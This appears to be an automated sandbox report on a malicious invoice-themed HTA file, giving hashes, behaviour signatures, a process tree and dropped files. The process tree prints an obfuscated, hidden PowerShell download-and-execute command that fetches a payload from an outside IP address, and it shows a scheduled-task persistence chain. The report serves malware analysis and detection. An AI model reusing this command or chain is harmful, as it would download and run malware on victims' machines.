Analysis

  • max time kernel
    128s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20231023-en
  • resource tags

    arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
  • submitted
    15/11/2023, 17:34

General

  • Target

    16112023_0133_15112023_Invoice#2356876431.hta

  • Size

    371B

  • MD5

    99153607b1542d57391bb96f7f6501a8

  • SHA1

    87496ae7cb23b015fb8da73af5f0fd7fc1373aa2

  • SHA256

    c08e13a2fe6a0b69b2c67f0fbd73c72c7c49bbdedef556da6b57197f995979e1

  • SHA512

    2f2bf163d4f646421dcbb1a0110007ac87701c81e57ac89335ca477784e976985d6bee92b79d1be73b327ecbfddfb399ce5a45ead6dc8f223be6d15a28cf850c

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 13 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\16112023_0133_15112023_Invoice#2356876431.hta"
    1⤵
    • Blocklisted process makes network request
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2888
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOP -WIND HIDDeN -eXeC BYPASS -NONI [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='/-/--/-/(''http://185.81.157.213:222/8X.jpg'')'.RePLACe('/-/--/-/','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2704
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {0BB06A32-9F4E-44DC-822A-1C2DA145C618} S-1-5-21-2085049433-1067986815-1244098655-1000:AHLBRYJO\Admin:Interactive:[1]
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Windows\System32\WScript.exe
      C:\Windows\System32\WScript.exe "C:\Users\Public\Conted.vbs"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1724
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\Users\Public\Conted.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:960
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\Conted.ps1'"
          4⤵
          • Drops file in System32 directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2788

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7C56MLPQ9URVD4E08GK6.temp

          Filesize

          7KB

          MD5

          b736b7049ac70ea3c2bde2fa7c318379

          SHA1

          6e34afeefd821bfc50417181197157cc7a980ba0

          SHA256

          a10aeb64e89586ddc3de876ca9edbf394a4fe80fb89f97ff26aa5b6674ef8201

          SHA512

          3f2002fd6a90f3725962e6b251d6d6e40996339596a93c2b1fb21a00e93482f1c1cf4348529248ba809f43f0940d98c9f6f8ae67adcfb7c68a4efc18e07f99a6

        • C:\Users\Public\Conted.bat

          Filesize

          205B

          MD5

          759278dd3dc3679bf7efd1ec681c0aa1

          SHA1

          72b37494696deea940ac75b4c4e06e2b6ce419ef

          SHA256

          cba344447d8228d88c93d64ffdcda1de8562ef41adc4901191548e00bbfc5f19

          SHA512

          8b4f63354c5aa1ec4102e7aadbb2da34b2a0ba2d3ae6b8d22a70fd75c3c3b9e70cd4ce8128bd50cb400970697c49810c4ef69f96352e36ba4f2b7a647ab8a27f

        • C:\Users\Public\Conted.vbs

          Filesize

          688B

          MD5

          110da9d3474ba64fa1a18c173685c25d

          SHA1

          9f093829518a9268bf9807fda7bef47e7832c497

          SHA256

          a31dbd6f7416f150403c19be69f02d5e8608f5e7fae88a29831d40db15849b60

          SHA512

          ef5fb4415fbd12e633ad964ca132ac3be81bfacd489db788b86fc7ef245d6f51bc08faecaf24874649d0c754b1892075a28042bf8483ab85b1996a25cfa57443

        • memory/2704-9-0x0000000071460000-0x0000000071A0B000-memory.dmp

          Filesize

          5.7MB

        • memory/2704-3-0x0000000071460000-0x0000000071A0B000-memory.dmp

          Filesize

          5.7MB

        • memory/2704-6-0x00000000026E0000-0x0000000002720000-memory.dmp

          Filesize

          256KB

        • memory/2704-5-0x00000000026E0000-0x0000000002720000-memory.dmp

          Filesize

          256KB

        • memory/2704-4-0x0000000071460000-0x0000000071A0B000-memory.dmp

          Filesize

          5.7MB

        • memory/2788-19-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

          Filesize

          9.6MB

        • memory/2788-20-0x00000000028E0000-0x0000000002960000-memory.dmp

          Filesize

          512KB

        • memory/2788-21-0x000000001B110000-0x000000001B3F2000-memory.dmp

          Filesize

          2.9MB

        • memory/2788-22-0x00000000028E0000-0x0000000002960000-memory.dmp

          Filesize

          512KB

        • memory/2788-23-0x0000000002320000-0x0000000002328000-memory.dmp

          Filesize

          32KB

        • memory/2788-24-0x00000000028E0000-0x0000000002960000-memory.dmp

          Filesize

          512KB

        • memory/2788-25-0x000007FEF53D0000-0x000007FEF5D6D000-memory.dmp

          Filesize

          9.6MB